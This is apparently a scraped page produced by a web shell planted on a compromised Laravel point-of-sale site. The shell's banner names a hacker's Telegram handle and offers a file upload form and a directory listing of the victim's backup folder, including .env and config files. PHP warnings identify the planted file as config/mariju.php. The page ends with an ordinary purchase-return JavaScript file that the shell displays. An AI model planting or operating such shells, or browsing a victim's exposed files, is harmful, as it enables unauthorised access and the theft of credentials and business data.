telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log11692886 KBJuly 18 2025 12:26:050644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
$(document).ready(function() { //get suppliers $('#supplier_id').select2({ ajax: { url: '/purchases/get_suppliers', dataType: 'json', delay: 250, data: function(params) { return { q: params.term, // search term page: params.page, }; }, processResults: function(data) { return { results: data, }; }, }, minimumInputLength: 1, escapeMarkup: function(m) { return m; }, templateResult: function(data) { if (!data.id) { return data.text; } var html = data.text + ' - ' + data.business_name + ' (' + data.contact_id + ')'; return html; } }); //Add products if ($('#search_product_for_purchase_return').length > 0) { //Add Product $('#search_product_for_purchase_return') .autocomplete({ source: function(request, response) { $.getJSON( '/products/list', { location_id: $('#location_id').val(), term: request.term }, response ); }, minLength: 2, response: function(event, ui) { if (ui.content.length == 1) { ui.item = ui.content[0]; if (ui.item.qty_available > 0 && ui.item.enable_stock == 1) { $(this) .data('ui-autocomplete') ._trigger('select', 'autocompleteselect', ui); $(this).autocomplete('close'); } } else if (ui.content.length == 0) { swal(LANG.no_products_found); } }, focus: function(event, ui) { if (ui.item.qty_available <= 0) { return false; } }, select: function(event, ui) { if (ui.item.qty_available > 0) { $(this).val(null); purchase_return_product_row(ui.item.variation_id); } else { alert(LANG.out_of_stock); } }, }) .autocomplete('instance')._renderItem = function(ul, item) { if (item.qty_available <= 0) { var string = '
  • ' + item.name; if (item.type == 'variable') { string += '-' + item.variation; } string += ' (' + item.sub_sku + ') (Out of stock)
  • '; return $(string).appendTo(ul); } else if (item.enable_stock != 1) { return ul; } else { var string = '
    ' + item.name; if (item.type == 'variable') { string += '-' + item.variation; } string += ' (' + item.sub_sku + ')
    '; return $('
  • ') .append(string) .appendTo(ul); } }; } $('select#location_id').change(function() { if ($(this).val()) { $('#search_product_for_purchase_return').removeAttr('disabled'); } else { $('#search_product_for_purchase_return').attr('disabled', 'disabled'); } $('table#stock_adjustment_product_table tbody').html(''); $('#product_row_index').val(0); }); $(document).on('change', 'input.product_quantity', function() { update_table_row($(this).closest('tr')); }); $(document).on('change', 'input.product_unit_price', function() { update_table_row($(this).closest('tr')); }); $(document).on('click', '.remove_product_row', function() { swal({ title: LANG.sure, icon: 'warning', buttons: true, dangerMode: true, }).then(willDelete => { if (willDelete) { $(this) .closest('tr') .remove(); update_table_total(); } }); }); //Date picker $('#transaction_date').datetimepicker({ format: moment_date_format + ' ' + moment_time_format, ignoreReadonly: true, }); $('form#purchase_return_form').validate(); $(document).on('click', 'button#submit_purchase_return_form', function(e) { e.preventDefault(); //Check if product is present or not. if ($('table#purchase_return_product_table tbody tr').length <= 0) { toastr.warning(LANG.no_products_added); $('input#search_product_for_purchase_return').select(); return false; } if ($('form#purchase_return_form').valid()) { $('form#purchase_return_form').submit(); } }); $('#tax_id').change(function() { update_table_total(); }); $('#purchase_return_product_table tbody') .find('.expiry_datepicker') .each(function() { $(this).datepicker({ autoclose: true, format: datepicker_date_format, }); }); }); function purchase_return_product_row(variation_id) { var row_index = parseInt($('#product_row_index').val()); var location_id = $('#location_id').val(); $.ajax({ method: 'POST', url: '/purchase-return/get_product_row', data: { row_index: row_index, variation_id: variation_id, location_id: location_id }, dataType: 'html', success: function(result) { $('table#purchase_return_product_table tbody').append(result); $('table#purchase_return_product_table tbody tr:last').find('.expiry_datepicker').datepicker({ autoclose: true, format: datepicker_date_format, }); update_table_total(); $('#product_row_index').val(row_index + 1); }, }); } function update_table_total() { var table_total = 0; $('table#purchase_return_product_table tbody tr').each(function() { var this_total = parseFloat(__read_number($(this).find('input.product_line_total'))); if (this_total) { table_total += this_total; } }); var tax_rate = parseFloat($('option:selected', $('#tax_id')).data('tax_amount')); var tax = __calculate_amount('percentage', tax_rate, table_total); __write_number($('input#tax_amount'), tax); var final_total = table_total + tax; $('input#total_amount').val(final_total); $('span#total_return').text(__number_f(final_total)); } function update_table_row(tr) { var quantity = parseFloat(__read_number(tr.find('input.product_quantity'))); var unit_price = parseFloat(__read_number(tr.find('input.product_unit_price'))); var row_total = 0; if (quantity && unit_price) { row_total = quantity * unit_price; } tr.find('input.product_line_total').val(__number_f(row_total)); update_table_total(); } function get_stock_adjustment_details(rowData) { var div = $('
    ') .addClass('loading') .text('Loading...'); $.ajax({ url: '/stock-adjustments/' + rowData.DT_RowId, dataType: 'html', success: function(data) { div.html(data).removeClass('loading'); }, }); return div; }